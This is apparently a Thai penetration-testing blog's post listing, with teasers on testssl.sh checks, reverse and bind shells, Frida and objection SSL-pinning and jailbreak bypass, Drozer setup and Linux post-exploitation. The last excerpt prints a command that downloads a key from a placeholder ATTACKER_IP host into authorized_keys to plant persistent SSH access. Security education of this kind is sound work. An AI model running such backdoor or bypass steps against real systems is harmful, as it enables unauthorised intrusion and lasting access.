69 posts
security
เราทราบกันดีอยู่แล้วว่า ณ ปัจจุบันเว็บไซด์ส่วนใหญ่เป็น HTTPS ไปหมดแล้ว ซึ่ง HTTPS ที่ว่าคือการใช้งาน protocol ssl/tls นั่นเอง ซึ่งแน่นอนว่าเมื่อมีการใช้งาน protocol ที่แตกต่างจากเดิม ปัญหาที่อาจจะเกิดขึ้นนั้นก็ต้องทดสอบแตกต่างไปจากเดิมเช่นกัน โดยปกติตัวผมเองมักจะใช้ testssl.sh ในการทดสอบหาปัญหา (issue) ของ HTTPS ต่างๆ ซึ่งเราสามารถตรวจสอบผลที่ได้จาก testssl.sh ได้โดยทำตามแต่ละ issue ดังต่อไปนี้ *** หมายเหตุ 1#…
ก่อนที่จะไปคุยกันว่า Ngrox คืออะไร เรามาย้อนทำความเข้าใจกับ Reverse Shell และ Bind Shell กันก่อนดีกว่าครับ ปัญหาใน Reverse Shell x Bind Shell จริงๆแล้วความหมายของ Reverse Shell และ Bind Shell นั้นจำกัดความง่ายมากครับ เมื่อเราสามารถทำการโจมตีไปยังเครื่องเป้าหมายได้สำเร็จ เราก็ต้องการจะควบคุมเครื่องนั้นๆใช่มั้ยครับ ซึ่งการจะควบคุมเครื่องนั้นๆได้มันก็จำเป็นที่เราจะต้องเชื่อมต่อไปยังเครื่องดังกล่าว โดยการเชื่อมต่อดังกล่าวนั้นก็มี 2 แบบคือ ไม่เราติดต่อไปหาผ่าน…
ก่อนหน้านี้เราเคยทำ certificate pinning bypass กันมาแล้วใน iOS ซึ่งมาคราวนี้ก็เป็น Android บ้าง แต่ถ้าถามว่ามันแตกต่างกันมั้ยก็ตอบได้เลยว่าไม่ครับ lol เอาเป็นว่ามาดูวิธีการทำกันดีกว่าครับ 1. ทำการ root Android Phone ซึ่งก็แล้วแต่ค่ายนะครับ 2. ที่เครื่อง Android, Run frida server บนเครื่อง Android (ติดตั้ง frida ตาม official…
ก่อนหน้านี้เราได้พูดถึง objection สำหรับการ inject และ bypass jailbreak detection และ ssl pinning กันมาแล้ว ประเด็นคือมันจะมีบางครั้งที่ Application ที่เราใช้งานนั้นไม่รองรับการใช้งาน SSL version ที่เป็น version ใหม่ๆ ซึ่ง admin เจอว่าถ้า Application นั้นไม่รองรับมันก็จะ error และเข้าใช้งานไม่ได้ (ต้องขอบคุณคุณแบงค์ @Prathan เทพผู้เชี่ยวชาญทางด้าน Mobile…
Objection เป็นตัวที่ทำให้การใช้งาน Frida นั้นง่ายขึ้น แทนที่จะต้องเขียน script ยาวๆ เค้าก็ปรับเปลี่ยนให้เป็น API ในการคุยกับ frida ให้เลย ซึ่งทำให้การทำ bypass jailbreak และ bypass ssl pinning ใน Mobile Application ทำได้ง่ายมาก โดยมี step ดังนี้ครับ 1. เปิด frida_server บน…
เราทราบกันดีว่า WPA3 กำลังจะมา แล้วยิ่งการเปิดเผยใหม่ของช่องโหว่ในการโจมตี WPA/WPA2 ออกมาใหม่ยิ่งบ่งบอกถึงเวลาที่เราน่าจะต้องเปลี่ยนไปใช้ WPA3 ยิ่งใกล้เข้ามาทุกที ก่อนจะไปไกลเรามาทำความเข้าใจกับ 4-way handshake ก่อน Access Point (AP) ส่ง nonce ไปยัง Client (ANonce). Client creates Pairwise Transient Key (PTK) (สร้างจาก Pairwise Master Key…
Source:: https://github.com/ansjdnakjdnajkd/iOS
โดยปกติแล้ว iOS Application จะมีการเข้ารหัสและทำ ASLR/PIE Protection ในการใช้งาน memory ไว้ ทีนี้หากเราต้องการจะให้มันเป็น Application ที่เราสามารถ debug ได้ด้วย IDA, Hopper หรืออะไรแนวๆนั้นก็สามารถใช้ crackulous, Clutch แต่เนื่องด้วยผมเอา iOS 11.3 มา Jailbreak แล้วใช้พวกนั้นไม่ได้เลย(จะทำแบบ manual ก็เสียเวลา) ก็เลยหาเครื่องมืออื่นมาช่วยนั่นคือ bfinject ครับ…
Drozer เป็นเครื่องมือสำหรับการตรวจสอบความปลอดภัยของ Mobile Application โดยจะเป็นการตรวจสอบแบบ Dynamic Analysis ครับ โดยวิธีการติดตั้งมีดังนี้ 1. Download deb และ whl จาก https://github.com/mwrlabs/drozer/releases 2. ติดตั้ง Required Package
3. ติตตั้ง Drozer App
4. สร้าง agent app
…
|
1 |
apt-get install python-protobuf |
|
1 2 |
dpkg -i drozer_2.4.4.deb pip install drozer-2.4.4-py2-none-any.whl |
|
1 |
drozer agent build |
ก่อนหน้านี้เราพูดถึงการทำ Privilege Escalation ด้วย sudo และ exploit path กันมาแล้ว วันนี้ก็เลยเอาอันอื่นๆที่จำเป็นเมื่อทำ post exploitation ใน Linux มารวมไว้ครับ 1. Add public key ไว้ใน authorised key เพื่อให้สามารถ login ได้
2. การรัน shell ผ่านคำสั่งต่างๆ…
|
1 |
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys |
LINE@Techsuii.com
Recent Comments